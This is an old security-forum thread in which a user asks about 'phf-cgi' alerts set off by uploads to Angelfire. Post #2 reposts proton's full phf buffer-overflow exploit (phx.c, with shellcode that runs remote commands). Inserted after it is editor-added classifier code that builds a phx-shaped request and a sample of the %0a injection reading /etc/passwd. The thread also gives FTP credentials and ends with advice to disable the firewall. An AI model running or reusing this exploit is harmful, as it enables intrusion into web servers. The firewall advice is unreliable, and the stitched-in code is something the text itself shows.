
Thread: phf-cgi

  1. #1
    Junior Member
    Join Date
    Dec 2003
    Posts
    3

    phf-cgi

    I was chatting with some kid I met through a mutual friend about hacking, and it was clear he knew way more about it all than I did. I asked him if he had any files or anything that would help me. Something easy and light, because I unfortunately don't have much time to dedicate to the craft, but it still interests me. I was perusing the ftp site he gave me
    (24.220.237.221 user: krelic pw: password [or he said the user anonymous would work without any password]) and I didn't really find anything; it looked like he was hosting a website there with a lot of forum code (Nuke or something). While I was looking about for these "files" he was talking about, I got an alert from my antivirus saying that I was attacked by his IP address with a Ripper trojan (or something). So I called him on it and asked if he was really going to help me or not, and he put some actual files on there that looked pretty helpful. Then, as I was trying to upload files to my Angelfire website (to update it so people back home [I'm currently deployed] can see what's going on), I kept getting denied because my computer was attacking Angelfire's IP with a phf-cgi attack. I deleted all the files I got from him (two zip files I never opened, and a .chm help file that I did look through) and it hasn't solved the problem. I restarted my computer and am able to upload files for about 5 minutes before my computer starts attacking on its own again. I've looked it all up on Symantec and read all about it all over, but all it does is tell me what it is and not how to stop it. Can it be stopped? I know that people coming straight here to get help annoys a lot of the elders of the community, but I really did look all I could elsewhere before turning to you. I even tried the hack3rs.com IRC channel but they didn't help. I really need to fix this by the end of the weekend because I'm going to be unable to get this stuff up for the next month if I can't finish it. Any help that anyone can give is much appreciated.
    Swift is the Phridum that comes for you...

  2. #2
    Google yielded http://www.cgisecurity.com/archive/cgi/phf2a.html

    Message-ID: <3A1286E7.32BC4568@energymech.net>
    Date: Wed, 15 Nov 2000 13:51:51 +0100
    Reply-To: proton
    Sender: Bugtraq List
    From: proton
    Subject: Exploit: phf buffer overflow (CGI)
    To: BUGTRAQ@SECURITYFOCUS.COM

    Funny how a program that's almost a decade old is still around
    to haunt us, isn't it?

    This should be a potent reminder for all CGI authors out there
    that these things can live forever.


    This exploit will give remote access on most (all?) Linux-ix86
    boxes (and FreeBSD?) with phf installed; patch or no patch,
    it's vulnerable.

    There is only one remedy, remove it!

    If your mailer(s) trash the source below, you can also download
    it from http://www.energymech.net/users/proton/phx.c

    /proton


    //---- phx.c ----
    /*
    | phx.c -- phf buffer overflow exploit for Linux-ix86
    | Copyright (c) 2000 by proton. All rights reserved.
    |
    | This program is free software; you can redistribute it and/or modify
    | it under the terms of the GNU General Public License as published by
    | the Free Software Foundation; either version 2 of the License, or
    | (at your option) any later version.
    |
    | This program is distributed in the hope that it will be useful,
    | but WITHOUT ANY WARRANTY; without even the implied warranty of
    | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
    | GNU General Public License for more details.
    */
    /*
    * The archived copy lost the header names inside the #include lines
    * (the angle brackets were stripped) and the definition of output();
    * both are restored here so the file compiles as posted.
    */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <errno.h>
    #include <netdb.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>

    #define output(s) write(1,(s),strlen(s))

    char tmp[8192];
    char *host;
    char *progname;

    /*
    * The whole HTTP request is the "shellcode": request line with the
    * overflow in the query string, then an X: header carrying the sled,
    * the machine code and the command to run.
    */
    unsigned char shellcode[] =
    "GET /cgi-bin/phf?&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&"
    /*
    * 2 pointers, in case of -fomit-frame-pointer
    */
    "\x37\xfc\xff\xbf"
    "\x37\xfc\xff\xbf"
    " HTTP/1.0\n"
    /*
    * set environment var `HTTP_X'
    */
    "X: "
    /*
    * a bundle of AAA's, they're just as good as NOP's
    * but is a tad bit more readable to humans.
    * 512 no-op instructions gives us a nice phat
    * strike-zone for the above 2 pointers.
    */
    "7777777777777777777777777777777777777777777777777777777777777777"
    "7777777777777777777777777777777777777777777777777777777777777777"
    "7777777777777777777777777777777777777777777777777777777777777777"
    "7777777777777777777777777777777777777777777777777777777777777777"
    "7777777777777777777777777777777777777777777777777777777777777777"
    "7777777777777777777777777777777777777777777777777777777777777777"
    "7777777777777777777777777777777777777777777777777777777777777777"
    "7777777777777777777777777777777777777777777777777777777777777777"
    /*
    * exploit code
    */
    "\xeb\x3b\x5e\x8d\x5e\x10\x89\x1e\x8d\x7e\x18\x89\x7e\x04\x8d\x7e\x1b\x89\x7e\x08"
    "\xb8\x40\x40\x40\x40\x47\x8a\x07\x28\xe0\x75\xf9\x31\xc0\x88\x07\x89\x46\x0c\x88"
    "\x46\x17\x88\x46\x1a\x89\xf1\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xc0\xff\xff\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41"
    /*
    * try to make sense to the webserver
    */
    "/bin/sh -c echo 'Content-Type: text/plain';echo '';"
    /*
    * execute something funny!
    */
    "echo Hello! I am running as \\\"`whoami`\\\" on a `arch` cpu;"
    "echo Local time is `date` and there are `who|wc -l` users logged in.;"
    "echo '';"
    /*
    * shellcode will terminate command at the `@'
    */
    "@\n\n"
    ;

    /* Resolve the target and open one TCP connection to port 80. */
    void netpipe(int *rsock, int *wsock)
    {
        struct sockaddr_in sai;
        struct hostent *he;
        int s;

        if (!host || !*host)
        {
            printf("Usage: %s <host>\n",progname);
            exit(1);
        }
        he = gethostbyname(host);
        if (!he)
        {
            printf("%s: Unknown host\n",host);
            exit(1);
        }

        s = socket(AF_INET,SOCK_STREAM,0);
        sai.sin_family = AF_INET;
        sai.sin_port = htons(80);
        memcpy(&sai.sin_addr,he->h_addr_list[0],sizeof(struct in_addr));

        if (connect(s,(struct sockaddr*)&sai,sizeof(sai)) < 0)
        {
            switch(errno)
            {
            case ECONNREFUSED:
                output("Connection refused.\n");
                break;
            case ETIMEDOUT:
                output("Connection timed out.\n");
                break;
            case ENETUNREACH:
                output("Network unreachable.\n");
                break;
            default:
                output("Unknown error.\n");
                break;
            }
            exit(1);
        }

        *rsock = *wsock = s;
    }

    int main(int argc, char **argv)
    {
        char *q,*cp;
        int in,out;
        int sz,x,n;

        progname = argv[0];
        host = argv[1];

        netpipe(&in,&out);

        /* send the whole request in one write */
        write(out,shellcode,sizeof(shellcode));

        output("\nCome to papa!\n\n");

        /* read the response and echo it line by line until the server closes */
        n = x = 0;
        for(;;)
        {
            sz = read(in,&tmp[x],512-x);
            if (sz < 1)
                break;
            x += sz;
            q = cp = tmp;
            for(sz=x;sz>0;)
            {
                if (*q == '\n')
                {
                    write(1,cp,(q-cp)+1);
                    cp = q + 1;
                }
                q++;
                sz--;
            }
            /* keep any partial line for the next read */
            if (cp != tmp)
            {
                sz = x - (cp - tmp);
                memcpy(tmp,cp,sz);
                x -= (cp - tmp);
            }
        }
        exit(0);
    }
    //---- end of file ----
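
    Added example, not from proton's phx.c and not from any of the posters: a small signature check for "phf" requests in the spirit of the IDS rule that fired in this thread, placed next to the naive substring match that fires on anything containing "phf". It classifies a request as a plain phf lookup, the old %0a newline command injection, or a phx.c-shaped overflow (raw pointer bytes in the query, a "/bin/sh" payload in a header). Every request it inspects is constructed here, the function and enum names are the editor's own, and the real shellcode bytes are left out of the constructed phx.c-style request.

```c
/* phf_request_check.c -- added example for this thread, not part of proton's
 * phx.c or any post.  Signature check for "phf" requests beside the naive
 * substring match that flags anything containing "phf".  All samples are
 * constructed; names here are the editor's, not an IDS product's. */
#include <stdio.h>
#include <string.h>

enum phf_verdict {
    PHF_NONE = 0,        /* request line does not reference /cgi-bin/phf    */
    PHF_LOOKUP,          /* ordinary phf query                                */
    PHF_NEWLINE_INJECT,  /* %0a in the query: the classic phf command inject  */
    PHF_OVERFLOW         /* phx.c shape: raw high bytes in the query, or a    */
                         /* header carrying "/bin/sh"                         */
};

/* Find "/cgi-bin/phf" in the request line; return the byte after it or NULL.
 * *linelen receives the request-line length (up to the first '\n'). */
static const char *find_phf(const char *req, size_t len, size_t *linelen)
{
    static const char needle[] = "/cgi-bin/phf";
    const size_t nlen = sizeof needle - 1;
    const char *eol = memchr(req, '\n', len);
    *linelen = eol ? (size_t)(eol - req) : len;
    for (size_t i = 0; i + nlen <= *linelen; i++)
        if (memcmp(req + i, needle, nlen) == 0)
            return req + i + nlen;
    return NULL;
}

/* Byte-wise pattern search; the buffer may hold NULs or high bytes. */
static int contains(const char *p, size_t n, const char *pat)
{
    size_t plen = strlen(pat);
    for (size_t i = 0; i + plen <= n; i++)
        if (memcmp(p + i, pat, plen) == 0)
            return 1;
    return 0;
}

enum phf_verdict classify_phf_request(const char *req, size_t len)
{
    size_t linelen;
    const char *q = find_phf(req, len, &linelen);
    if (!q)
        return PHF_NONE;

    /* Query string: after the path, up to the " HTTP/1.x" token. */
    const char *line_end = req + linelen;
    const char *qend = memchr(q, ' ', (size_t)(line_end - q));
    if (!qend)
        qend = line_end;
    size_t qlen = (size_t)(qend - q);

    /* phx.c writes its two 0xbffffc37 return-address guesses straight into
     * the request line, so raw bytes >= 0x80 in the query are the cheapest
     * overflow tell; an oversized query or "/bin/sh" in a header also count. */
    for (size_t i = 0; i < qlen; i++)
        if ((unsigned char)q[i] >= 0x80)
            return PHF_OVERFLOW;
    if (qlen > 512 || contains(line_end, (size_t)(req + len - line_end), "/bin/sh"))
        return PHF_OVERFLOW;

    if (contains(q, qlen, "%0a") || contains(q, qlen, "%0A"))
        return PHF_NEWLINE_INJECT;
    return PHF_LOOKUP;
}

/* Convenience wrapper for NUL-terminated requests. */
enum phf_verdict classify_phf_string(const char *req)
{
    return classify_phf_request(req, strlen(req));
}

/* The sloppy rule: "phf" anywhere in the stream, headers and body included. */
int naive_phf_match(const char *req, size_t len)
{
    return contains(req, len, "phf");
}

/* Construct a request shaped like phx.c's: '&' padding, the two raw pointer
 * values, then an X: header with a sled of '7' and the /bin/sh -c payload.
 * Returns the length written, or 0 if cap is too small. No real shellcode. */
size_t build_phx_like_request(char *buf, size_t cap)
{
    static const char head[] = "GET /cgi-bin/phf?";
    static const char ptrs[] = "\x37\xfc\xff\xbf\x37\xfc\xff\xbf";
    static const char mid[]  = " HTTP/1.0\nX: ";
    static const char tail[] = "/bin/sh -c echo 'Content-Type: text/plain';echo '';id;@\n\n";
    size_t n = 0;
    if (cap < sizeof head + 64 + 8 + sizeof mid + 512 + sizeof tail)
        return 0;
    memcpy(buf + n, head, sizeof head - 1); n += sizeof head - 1;
    memset(buf + n, '&', 64);               n += 64;
    memcpy(buf + n, ptrs, 8);               n += 8;
    memcpy(buf + n, mid, sizeof mid - 1);   n += sizeof mid - 1;
    memset(buf + n, '7', 512);              n += 512;
    memcpy(buf + n, tail, sizeof tail - 1); n += sizeof tail - 1;
    return n;
}

enum phf_verdict phx_sample_verdict(void)
{
    static char buf[2048];
    size_t n = build_phx_like_request(buf, sizeof buf);
    return classify_phf_request(buf, n);
}

int main(void)
{
    /* Constructed samples: a plain lookup, the %0a injection, and an upload
     * whose body merely mentions "phf" (the false-positive case). */
    const char *samples[] = {
        "GET /cgi-bin/phf?Qname=smith HTTP/1.0\n\n",
        "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0\n\n",
        "POST /cgi-bin/upload.cgi HTTP/1.0\nHost: www.example.net\n\nfile=phf-notes.txt\n",
    };
    printf("phx.c-shaped request: verdict %d (3 = overflow)\n", phx_sample_verdict());
    for (size_t i = 0; i < sizeof samples / sizeof *samples; i++)
        printf("sample %zu: signature verdict %d, naive match %d\n", i,
               classify_phf_string(samples[i]),
               naive_phf_match(samples[i], strlen(samples[i])));
    return 0;
}
```

    The third sample is the point of post #6 below: the signature that keys on the request line says PHF_NONE, while a rule that matches "phf" anywhere in the stream fires on an upload body that happens to contain the string. A desktop product that alerts on such traffic is reporting its own match, not an infection.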

  3. #3
    Macht Nicht Aus moxnix's Avatar
    Join Date
    May 2002
    Location
    Huson Mt.
    Posts
    1,752
    The Cleaner by Moosoft also handles most trojans very well. It has an evaluation period during which you can use it for free, but you might also want to buy it if you keep going to sites like that one or fooling with the script kiddies as you seem to. You will need it frequently. http://www.moosoft.com/products/cleaner/

    I suggest you get a good firewall, and updated AV also. (search the site for the better firewalls and AV engines)
    "Life should NOT be a journey to the grave with the intention of arriving safely in an attractive and well preserved body, but rather to skid in sideways, Champagne in one hand - strawberries in the other, body thoroughly used up, totally worn out and screaming WOO HOO - What a Ride!"
    Author Unknown

  4. #4
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,188
    I won't preach....honest.....

    If you are going to experiment with malware and visit the "dark side" of the web, please get yourself an old 486/PI or whatever. You should be able to get one for free or next to nothing.

    Don't use your main machine
    Don't use a shared machine
    Don't use a machine that you don't own (legally)
    Don't use a machine on a network

    Burn all OS fixes/patches onto a CD because you will be reformatting and re-installing a lot

    Good luck

  5. #5
    Junior Member
    Join Date
    Dec 2003
    Posts
    3
    I already use Norton AntiVirus and Internet Security. I'm running XP, and all the help I've been getting is for Linux and such. I'll try the Moosoft, but somehow I don't really think it's a typical trojan... but really, I don't know anything about anything, so we'll see. Thanks for the help.
    Swift is the Phridum that comes for you...

  6. #6
    Junior Member
    Join Date
    Dec 2003
    Posts
    3
    Alright, this makes me look pretty stupid, but because I really don't know all that much about this stuff, I'll swallow my pride and let you know... I wondered if I would be able to upload all my files if Norton didn't stop me from just performing the "attack". I disabled Norton and it all went smoothly. So I think what was really happening was what usually happens, but because of the specific code that was going between me and Angelfire's upload utility, Norton just saw it as the typical "phf-cgi" attack. But it wasn't... so if this same thing is happening to you, just disable the firewall for the moment and proceed with the upload. Thanks for all the help and sorry for wasting your time. (Kinda wish I still had those help files I had gotten from that kid, though...)
    Swift is the Phridum that comes for you...
